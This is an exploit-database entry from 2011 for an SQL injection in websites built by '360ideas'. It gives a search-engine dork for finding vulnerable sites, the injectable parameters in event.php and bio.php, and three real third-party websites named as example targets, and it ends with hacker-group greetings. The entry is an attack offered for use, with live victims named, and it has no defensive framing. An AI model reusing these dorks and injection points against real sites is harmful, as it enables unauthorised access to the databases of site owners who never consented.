360ideas => SQL Injection vulnerability

2011-06-15T00:00:00
ID 1337DAY-ID-16342
Type zdt
Reporter Ratchet
Modified 2011-06-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Title :360ideas => SQL Injection
# Author: Ratchet
# Home : www.alboraaq.com,www.indishell.in,www.pro2leet.net,www.teamnuts.in
# Email: [email protected]
# Date: 15/6/2011
# D0rk: intext:intext:"Site by 360ideas"
# Tested on:Windows Xp and Windows 7
# Catagory : Web Apps [Sql]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[-]   Exploit:-

    #http://[localhost]/event.php?id=52'
    #http://[localhost]/event.php?id=[SQLi]

    #http://[localhost]/idx/5917/bio.php?id=102'
    #http://[localhost]/idx/5917/bio.php?id=[SQLi]

[-]   Example:-
    #http://www.kciexpo.com/event.php?id=52'
    #http://www.wabahome.com/event.php?id=14'
    #http://idx.plazare.com/idx/5917/bio.php?id=102'

G00D LUCK ALL :)


===========================+++++Greatz to++++

+=====================================
T3es,Sideswipe,ssgodfather,Foxmind,underscore,prosperous,hackcore,[email protected],j|

nx,shani,balazee,Xan,starlash,Hexcoder,,johnblund,Anthrax,
!-Bb0yH4cK3r_Dz-!,HexCoder,xConsoLe,mugen
                          And all my friends
========================================================================



#  0day.today [2018-01-01]  #